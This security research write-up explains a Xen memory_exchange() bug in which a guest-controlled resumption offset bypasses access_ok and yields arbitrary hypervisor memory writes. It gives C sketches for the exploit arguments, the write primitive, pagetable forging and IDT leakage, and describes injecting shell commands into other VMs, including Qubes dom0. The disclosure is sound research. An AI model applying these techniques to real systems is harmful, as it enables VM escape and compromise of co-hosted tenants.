* non-canonical address (and thus fault) before ever reaching VIRT_START.
*/
#define __addr_ok(addr) \
   (((unsigned long)(addr) < (1UL<<47)) || \
    ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \
   (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
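
The difference is easy to miss during code review, as the sketch below shows; both variants look plausible, but only the second validates the element range that is actually accessed:

/* UNSAFE if 'first' is guest-controlled: validates elements [0, nr) of the
   array, while the subsequent code accesses elements [first, first + nr). */
if ( !guest_handle_okay(hnd, nr) )
    return -EFAULT;

/* SAFE: validates exactly the elements that will be accessed. */
if ( !guest_handle_subrange_okay(hnd, first, first + nr - 1) )
    return -EFAULT;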

When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.

In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.

This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.

This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.
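
In memory_exchange() (discussed below), the preemption pattern looks roughly like this simplified sketch, based on xen/common/memory.c with error handling and details elided:

/* Inside memory_exchange()'s main loop, before processing chunk i: */
if ( hypercall_preempt_check() )
{
    /* Store the progress counter in guest-writable memory... */
    exch.nr_exchanged = i << in_chunk_order;
    if ( __copy_field_to_guest(arg, &exch, nr_exchanged) )
        return -EFAULT;
    /* ...and arrange for the hypercall to be re-entered later. */
    return hypercall_create_continuation(
        __HYPERVISOR_memory_op, "lh", XENMEM_exchange, arg);
}

The crucial property is that the resumption state lives in guest memory: nothing forces a guest to actually go through the preemption path, so it can simply invoke the hypercall directly with an arbitrary nr_exchanged value of its choosing.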

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:

struct xen_memory_reservation {
   /* [...] */
   XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

   /* Number of extents, and size/alignment of each (2^extent_order pages). */
   xen_ulong_t    nr_extents;
   unsigned int   extent_order;

   /* XENMEMF flags. */
   unsigned int   mem_flags;

   /*
    * Domain whose reservation is being changed.
    * Unprivileged domains can specify only DOMID_SELF.
    */
   domid_t        domid;
};

struct xen_memory_exchange {
   /*
    * [IN] Details of memory extents to be exchanged (GMFN bases).
    * Note that @in.address_bits is ignored and unused.
    */
   struct xen_memory_reservation in;

   /*
    * [IN/OUT] Details of new memory extents.
    * We require that:
    *  1. @in.domid == @out.domid
    *  2. @in.nr_extents  << @in.extent_order ==
    *     @out.nr_extents << @out.extent_order
    *  3. @in.extent_start and @out.extent_start lists must not overlap
    *  4. @out.extent_start lists GPFN bases to be populated
    *  5. @out.extent_start is overwritten with allocated GMFN bases
    */
   struct xen_memory_reservation out;

   /*
    * [OUT] Number of input extents that were successfully exchanged:
    *  1. The first @nr_exchanged input extents were successfully
    *     deallocated.
    *  2. The corresponding first entries in the output extent list correctly
    *     indicate the GMFNs that were successfully exchanged.
    *  3. All other input and output extents are untouched.
    *  4. If not all input extents are exchanged then the return code of this
    *     command will be non-zero.
    *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
    */
   xen_ulong_t nr_exchanged;
};

The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.

nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.

Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

diff --git a/xen/common/memory.c b/xen/common/memory.c
index 4e7c234..59379d3 100644
--- a/xen/common/memory.c
+++ b/xen/common/memory.c
@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
        goto fail_early;
    }
+    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
+    {
+        rc = -EFAULT;
+        goto fail_early;
+    }
+
    /* Only privileged guests can allocate multi-page contiguous extents. */
    if ( !multipage_allocation_permitted(current->domain,
                                         exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:

static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
{
   [...]

   /* Various sanity checks. */
   [...]

   if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
        !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
   {
       rc = -EFAULT;
       goto fail_early;
   }

   [...]

   for ( i = (exch.nr_exchanged >> in_chunk_order);
         i < (exch.in.nr_extents >> in_chunk_order);
         i++ )
   {
       [...]
       /* Assign each output page to the domain. */
       for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
       {
           [...]
           if ( !paging_mode_translate(d) )
           {
               [...]
               if ( __copy_to_guest_offset(exch.out.extent_start,
                                           (i << out_chunk_order) + j,
                                           &mfn, 1) )
                   rc = -EFAULT;
           }
       }
       [...]
   }
   [...]
}

However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:

  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).
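
Translated into code, the argument setup from the list above might look like the following sketch (input_buffer is a guest kernel pointer to a guest-owned physical page number, as described above; the .p member is how the public Xen headers represent guest handles, and set_xen_guest_handle() would normally be used to assign it):

#include <stdint.h>

/* Sketch: build XENMEM_exchange arguments that make Xen write one physical
   page number to target_addr in hypervisor memory. */
void build_exploit_args(struct xen_memory_exchange *exch,
                        uint64_t target_addr, xen_pfn_t *input_buffer)
{
    uint64_t nr_exchanged = target_addr / 8;

    exch->nr_exchanged     = nr_exchanged;
    exch->in.extent_order  = 0;               /* page-sized blocks */
    exch->out.extent_order = 0;
    exch->in.nr_extents    = nr_exchanged + 1;
    exch->out.nr_extents   = nr_exchanged + 1;

    /* out.extent_start + 8 * nr_exchanged == target_addr, with the base
       pointer itself close to NULL so guest_handle_okay() passes. */
    exch->out.extent_start.p = (xen_pfn_t *)(target_addr % 8);

    /* in.extent_start + 8 * nr_exchanged == input_buffer, so the resumed
       loop reads a legitimate, guest-owned page number. */
    exch->in.extent_start.p = input_buffer - nr_exchanged;
}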

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:

  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
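
Concretely, the 9 controlled bytes consist of a pagetable entry for the fake pagetable plus a zeroed first byte for the following entry. A sketch of the entry value, using the standard x86-64 pagetable bit layout:

#include <stdint.h>

#define PAGE_PRESENT  (1ULL << 0)
#define PAGE_RW       (1ULL << 1)
#define PAGE_USER     (1ULL << 2)
#define PAGE_ACCESSED (1ULL << 5)

/* Level 3 entry pointing at the guest-writable "fake pagetable": the
   physical page number goes into bits 12 and up, flags into the low bits. */
static inline uint64_t make_l3_entry(uint64_t fake_pt_pfn)
{
    return (fake_pt_pfn << 12) | PAGE_PRESENT | PAGE_RW | PAGE_USER |
           PAGE_ACCESSED;
}

/* The 9th byte: writing zero into the first byte of the following entry
   clears its present bit, so its remaining garbage bytes are never used. */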

Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.

Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
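
Expressed as code, the conversion chain might look like the sketch below; write_primitive() stands for one invocation of the corrupted XENMEM_exchange hypercall aimed at the chosen address, and read_byte() reads the result back through the guest's readonly mapping of the victim page (both are hypothetical helpers):

#include <stdint.h>
#include <stddef.h>

void    write_primitive(uint64_t target_addr);  /* 1 random byte + 7 garbage */
uint8_t read_byte(uint64_t target_addr);        /* readback via readonly mapping */

/* "One controlled byte": retry the random-byte write until the readback
   matches; roughly 256 attempts per byte on average. */
static void write_byte(uint64_t addr, uint8_t value)
{
    do {
        write_primitive(addr);
    } while (read_byte(addr) != value);
}

/* "Controlled data followed by 7 bytes of garbage": writing low-to-high
   means each write's garbage tail is fixed up by the writes that follow. */
static void write_data(uint64_t addr, const uint8_t *data, size_t len)
{
    for (size_t i = 0; i < len; i++)
        write_byte(addr + i, data[i]);
}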

At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory. A realistic attacker probably wouldn't want to go further and inject code into VMs, considering how much more detectable that makes an attack.

But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.

As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
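
Reading the IDT base is a single unprivileged instruction on pre-UMIP hardware; a sketch:

#include <stdint.h>

struct __attribute__((packed)) idtr {
    uint16_t limit;
    uint64_t base;  /* virtual address of the IDT in hypervisor memory */
};

/* SIDT executes at any privilege level on current CPUs, so a guest can
   leak the hypervisor's IDT location without any special rights. */
static inline uint64_t read_idt_base(void)
{
    struct idtr idtr;
    asm volatile("sidt %0" : "=m"(idtr));
    return idtr.base;
}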

Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.

My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.

(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)

Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:



Conclusion

I believe that the root cause of this issue was the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code.